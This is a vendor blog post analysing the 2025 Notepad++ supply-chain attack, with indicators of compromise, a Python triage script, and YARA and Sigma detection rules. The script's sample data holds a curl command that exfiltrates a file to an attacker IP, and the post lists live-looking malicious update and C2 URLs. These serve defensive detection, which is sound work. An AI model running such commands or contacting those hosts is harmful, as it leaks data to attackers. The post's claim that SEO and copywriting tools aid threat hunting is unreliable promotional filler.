- Updated: February 3, 2026
Notepad++ Supply Chain Attack Uncovered – Detailed Analysis
Answer: The Notepad++ supply‑chain attack, uncovered in a detailed Securelist report, involved compromised update servers that delivered malicious NSIS installers, leading to multi‑stage payloads such as Cobalt Strike beacons and custom backdoors across several months in 2025.
Notepad++ Supply‑Chain Attack: Timeline, Technical Deep‑Dive, and Immediate Mitigation Steps

Why This Attack Matters for Every IT Security Manager
On February 2, 2026, the developers of Notepad++ announced that their update infrastructure had been compromised. The breach, which spanned from June to September 2025, allowed threat actors to push malicious updates to a global user base, including high‑profile organizations in finance, government, and IT services. The full technical breakdown is documented in the Securelist report, which we have paraphrased and expanded with actionable guidance for security teams.
1️⃣ Overview of the Notepad++ Supply‑Chain Attack Timeline
- Late July – Early August 2025 (Chain #1): First malicious update hosted at `http://45.76.155.202/update/update.exe`. Delivered an NSIS installer that harvested system data and dropped a Cobalt Strike beacon via a ProShow exploit.
- Mid‑September – End September 2025 (Chain #2): Attackers rotated to a slimmer NSIS payload (≈140 KB) that stored data in `%APPDATA%\Adobe\Scripts` and executed a Lua‑based downloader.
- Early October 2025 (Chain #3): New C2 server `http://45.32.144.255/update/update.exe` introduced DLL sideloading against `BluetoothService.exe`, deploying the Chrysalis backdoor.
- Mid‑October 2025 (Return of Chain #2): Attackers reused the Lua‑based chain but shifted to `http://95.179.213.0/update/` URLs and new DNS‑based C2 domains.
- November 2025 onward: No further malicious updates observed, suggesting the actors either retired the vector or shifted tactics.
2️⃣ Technical Details: Malicious Updates, IoCs, and Attack Vectors
🔧 Malicious Update Mechanics
All three chains relied on the legitimate Notepad++ updater process GUP.exe to launch a compromised NSIS installer (update.exe). The installer performed two core actions:
- System‑information harvesting: Executed `whoami`, `tasklist`, and later `systeminfo & netstat -ano`. Results were uploaded to the public file‑hosting service `temp.sh` via `curl.exe`, with the upload URL embedded in the HTTP User‑Agent header.
- Payload delivery: Dropped additional files into obscure `%APPDATA%` subfolders and launched them. Chain #1 abused a legacy vulnerability in ProShow, Chain #2 used a Lua interpreter to run a compiled script, and Chain #3 performed DLL sideloading against a legitimate Bluetooth service.
🛡️ Indicators of Compromise (IoCs)
Below is a consolidated table of the most reliable IoCs extracted from the Securelist analysis. Use these hashes, URLs, and file paths for detection rules in SIEMs, EDRs, or IDS/IPS solutions.
| Type | Value |
|---|---|
| Malicious update URLs | http://45.76.155.202/update/update.exe, http://45.32.144.255/update/update.exe, http://95.179.213.0/update/update.exe |
| System‑info upload URLs | http://45.76.155.202/list, https://self-dns.it.com/list |
| Cobalt Strike beacon download URLs | https://45.77.31.210/users/admin, https://cdncheck.it.com/users/admin, https://safe-dns.it.com/help/Get-Start |
| NSIS installer SHA‑1 hashes | 8e6e505438c21f3d281e1cc257abdbf7223b7f5a, 90e677d7ff5844407b9c073e3b7e896e078e11cd, 573549869e84544e3ef253bdba79851dcde4963a, 13179c8f19fbf3d8473c49983a199e6cb4f318f0, 4c9aac447bf732acc97992290aa7a187b967ee2c, 821c0cafb2aab0f063ef7e313f64313fc81d46cd |
| Dropped file paths | %APPDATA%\ProShow\load, %APPDATA%\Adobe\Scripts\alien.ini, %APPDATA%\Bluetooth\BluetoothService |
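As an added example (not code from the article or from the Securelist report), the following Python triages process‑creation records against the update mechanics described above and the IoC table: the legitimate `GUP.exe` launching an `update.exe` whose SHA‑1 is a known installer hash, `curl.exe` uploading to `temp.sh`, execution from the `%APPDATA%` drop paths, and C2 hosts appearing on command lines. The sample records, the `Temp` download location and the user name are constructed assumptions shaped like Sysmon Event ID 1 fields.

```python
import re
# IoCs copied from the article's table: NSIS installer SHA-1s, C2 hosts, dropped file paths.
IOC_SHA1 = {
    "8e6e505438c21f3d281e1cc257abdbf7223b7f5a", "90e677d7ff5844407b9c073e3b7e896e078e11cd",
    "573549869e84544e3ef253bdba79851dcde4963a", "13179c8f19fbf3d8473c49983a199e6cb4f318f0",
    "4c9aac447bf732acc97992290aa7a187b967ee2c", "821c0cafb2aab0f063ef7e313f64313fc81d46cd",
}
IOC_HOSTS = {"45.76.155.202", "45.32.144.255", "95.179.213.0", "45.77.31.210",
             "self-dns.it.com", "cdncheck.it.com", "safe-dns.it.com"}
IOC_PATHS = (r"\proshow\load", r"\adobe\scripts\alien.ini", r"\bluetooth\bluetoothservice")

def triage_event(ev):
    """Return the detections one Sysmon Event ID 1 (process creation) record triggers."""
    image, parent = ev.get("Image", "").lower(), ev.get("ParentImage", "").lower()
    cmd, hits = ev.get("CommandLine", "").lower(), []
    m = re.search(r"SHA1=([0-9a-fA-F]{40})", ev.get("Hashes") or "")  # Sysmon: 'SHA1=...,MD5=...'
    sha1 = m.group(1).lower() if m else ""
    # 1. Legitimate updater GUP.exe launching an update.exe that hashes to a known bad installer.
    if parent.endswith(r"\gup.exe") and image.endswith(r"\update.exe") and sha1 in IOC_SHA1:
        hits.append("known_malicious_nsis_installer")
    # 2. curl.exe shipping the harvested system information to temp.sh.
    if image.endswith(r"\curl.exe") and "temp.sh" in cmd:
        hits.append("tempsh_exfil_via_curl")
    # 3. Execution from the %APPDATA% drop locations used by the three chains.
    if any(p in image or p in cmd for p in IOC_PATHS):
        hits.append("known_drop_path")
    # 4. Any C2 host from the IoC table appearing on a command line.
    if any(h in cmd for h in IOC_HOSTS):
        hits.append("c2_host_in_command_line")
    return hits

def triage_events(events):
    """Map event index -> detections, keeping only the events that triggered something."""
    return {i: h for i, ev in enumerate(events) if (h := triage_event(ev))}

# Constructed sample records shaped like Sysmon Event ID 1; they are not real telemetry.
SAMPLE_EVENTS = [
    {"Image": r"C:\Program Files\Notepad++\updater\GUP.exe", "ParentImage": r"C:\Program Files\Notepad++\notepad++.exe",
     "CommandLine": "GUP.exe", "Hashes": "SHA1=0000000000000000000000000000000000000000"},
    {"Image": r"C:\Users\alice\AppData\Local\Temp\update.exe", "ParentImage": r"C:\Program Files\Notepad++\updater\GUP.exe",
     "CommandLine": "update.exe", "Hashes": "SHA1=8E6E505438C21F3D281E1CC257ABDBF7223B7F5A,MD5=d41d8cd98f00b204e9800998ecf8427e"},
    {"Image": r"C:\Windows\System32\curl.exe", "ParentImage": r"C:\Users\alice\AppData\Local\Temp\update.exe",
     "CommandLine": 'curl.exe -A "https://temp.sh/abcd" -F file=@info.txt http://45.76.155.202/list', "Hashes": ""},
    {"Image": r"C:\Users\alice\AppData\Roaming\Bluetooth\BluetoothService.exe",
     "ParentImage": r"C:\Users\alice\AppData\Local\Temp\update.exe", "CommandLine": "BluetoothService.exe", "Hashes": ""},
]

if __name__ == "__main__":
    print(triage_events(SAMPLE_EVENTS))
```

The benign first record (GUP.exe itself, started by Notepad++) produces no hit, which is the false‑positive check a hunting query over real telemetry should also pass.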
⚙️ Attack Vector Evolution
The attackers demonstrated a clear pattern of “rotate‑and‑reuse”:
- Domain & IP hopping: Every few weeks a new C2 domain or IP address was introduced, complicating static blocklists.
- Payload diversification: From a ProShow exploit (Chain #1) to Lua script execution (Chain #2) and finally DLL sideloading (Chain #3), the threat actors avoided reliance on a single technique.
- Obfuscation tactics: Padding shellcode, XOR‑encrypted payloads, and the use of legitimate tools (curl, NSIS) reduced heuristic detection rates.
3️⃣ Impact Assessment and Affected Users
Although the total number of compromised machines appears modest (≈12 hosts), the affected entities span multiple sectors:
- Individual developers in Vietnam, El Salvador, and Australia.
- A government agency in the Philippines.
- A financial institution in El Salvador.
- An IT services provider in Vietnam.
Each victim experienced a full Cobalt Strike beacon lifecycle, granting the attackers remote command‑and‑control, lateral movement, and data exfiltration capabilities. The presence of the Chrysalis backdoor in Chain #3 indicates a potential for long‑term persistence and custom command modules.
4️⃣ Recommended Detection and Mitigation Steps
Security teams can adopt a layered approach that combines immediate containment with long‑term hardening.
🛑 Immediate Containment
- Block known malicious URLs and IPs: Add the update URLs and C2 domains listed in the IoC table to your proxy or firewall deny list.
- Quarantine affected endpoints: Isolate any host that shows the NSIS installer hash or the `%APPDATA%\ProShow`, `%APPDATA%\Adobe\Scripts`, or `%APPDATA%\Bluetooth` artifacts.
- Revoke compromised credentials: If the attacker harvested user accounts via the `whoami` command, enforce password resets and MFA.
🔍 Detection Rules (Examples)
Below are sample YARA and Sigma rules that can be imported into most EDR platforms.
```yara
// YARA rule for the malicious NSIS installer
import "hash"

rule NotepadPP_Malicious_NSIS {
    meta:
        description = "Detects NSIS installers used in the Notepad++ supply-chain attack"
        author = "UBOS Threat Intel"
        reference = "Securelist report"
    strings:
        $url = "45.76.155.202/update/update.exe"
    condition:
        // A file never contains its own SHA-1, so the digest is compared with the hash module
        // rather than searched for as a byte pattern.
        $url or hash.sha1(0, filesize) == "8e6e505438c21f3d281e1cc257abdbf7223b7f5a"
}
```
```yaml
# Sigma rule for temp.sh upload activity
title: Suspicious Temp.sh Upload from Notepad++ Updater
id: 5c9f8a2b-3d4e-4f1a-9c2b-7e6d9f1a2c3d
status: stable
description: Detects curl.exe uploading harvested system information to temp.sh, as performed by the malicious update.exe launched by the Notepad++ updater
author: UBOS SOC
logsource:
  product: windows
  category: process_creation
detection:
  selection:
    Image|endswith: '\curl.exe'
    # The harvested command output is uploaded as a file, so only the temp.sh destination
    # (not the 'whoami' command itself) is visible on the curl command line.
    CommandLine|contains: 'temp.sh'
  condition: selection
level: high
```
🛡️ Long‑Term Hardening
- Implement code‑signing verification: Enforce that only digitally signed binaries from trusted publishers can execute, blocking unsigned NSIS installers.
- Adopt zero‑trust network segmentation: Restrict outbound traffic from workstations to only approved update servers (e.g., official Notepad++ CDN).
- Leverage AI‑driven threat hunting: Use AI SEO Analyzer or AI Article Copywriter to automatically generate hunting queries based on emerging IoCs.
- Continuous monitoring of third‑party software supply chains: Integrate UBOS platform overview with your asset inventory to receive real‑time alerts on compromised vendors.
5️⃣ Next Steps for Security Leaders
Staying ahead of supply‑chain threats requires both technology and process. UBOS offers a suite of solutions that can accelerate your response:
- Explore the Enterprise AI platform by UBOS for automated IOC ingestion and correlation.
- Deploy the Workflow automation studio to orchestrate containment playbooks the moment a malicious update is detected.
- Leverage ready‑made UBOS templates for quick start, such as the “AI Threat Hunting” template, to jump‑start investigations.
- Consider joining the UBOS partner program for exclusive threat‑intel feeds and joint response capabilities.
For a deeper dive into how AI can augment your security operations, read our guide on AI marketing agents—the same underlying technology powers advanced detection engines.
Conclusion
The Notepad++ supply‑chain attack illustrates how even widely trusted open‑source tools can become vectors for sophisticated, multi‑stage malware campaigns. By understanding the attack timeline, recognizing the unique IoCs, and applying the detection and mitigation steps outlined above, security teams can neutralize current threats and fortify their environments against future supply‑chain compromises.
Stay informed, stay prepared, and let UBOS help you turn threat intelligence into actionable defense.
Discover more about our platform on the UBOS homepage and learn how our Web app editor on UBOS can accelerate secure software development.
For startups seeking rapid AI integration, see UBOS for startups. SMBs can benefit from UBOS solutions for SMBs, while enterprises may explore the Enterprise AI platform by UBOS.
Need pricing details? Check out our UBOS pricing plans and find the right tier for your organization.